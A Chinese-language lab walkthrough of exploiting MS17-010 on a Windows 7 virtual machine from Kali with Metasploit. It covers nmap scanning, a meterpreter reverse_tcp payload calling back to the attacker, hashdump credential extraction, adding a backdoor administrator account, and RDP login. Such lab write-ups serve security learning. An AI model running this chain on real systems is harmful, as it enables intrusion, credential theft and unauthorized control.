工具准备:安装好的kali和win7虚拟机。
一、获取kali和win7的IP地址
通过ifconfig命令,获取kali的IP信息,如图显示为192.168.88.128
通过ipconfig命令获取win7ip地址,如图192.168.88.130
注:两个虚拟机选择同一模式,使两者IP处于同一网段。
二、使用nmap扫描win7端口及版本信息
在kali命令行输入,nmap -O -sS 192.168.88.130 ,显示445端口开放,系统版本为win7。
三、启用ms17-010对目标win7进行攻击,获取管理员密码,新建管理用户,并远程连接。
1、输入msfconsole命令,启用ms17-010
2、搜索攻击模块,输入search ms17-010,可以看到共四个模块。
3、选择模块0,输入use 0,显示已经默认攻击负载windows/x64/meterpreter/reverse_tcp
4、设置攻击目标IP,输入set rhost 192.168.88.130
5、设置攻击者IP,输入set lhost 192.168.88.128
6、查看状态信息,输入show options,查看目标地址、攻击者地址和负载是否错误。
7、开始攻击,输入run。
8、目前为止,已经通过445端口攻入了win7系统。开始查看用户名和密码,输入hashdump。
可以看到用户名为client,密码为加密后的一串字符。通过对字符串进行解密,可以查看密码信息。
9、在前面的基础上,我们也可以建立新的管理账户,进行远程连接,使用目标系统。
a、输入shell命令,进入windows命令行界面。
b、开始出现乱码,别急,我们继续查看目标IP,输入ipconfig命令。
c、已经可以看到IP了,接下来开始清理乱码,输入chcp 65001。
d、再次查看IP,输入ipconfig命令。
e、接下来在win7上新建用户,输入net user sss 123456 /add
f、查看是否新建成功,输入net user,可以看到新建成功
g、将用户提升为管理管,输入net localgroup administrators sss /add
h、查看win7的3389端口是否开放,输入netstat -ano,可以看到是开放的。
i、接下来连接win7,在kali上开一个新窗口,输入rdesktop 192.168.88.130:3389,会弹出一个新的窗口。
j、选择其他用户,输入新建的用户密码,就可以登陆win7系统、完成连接了。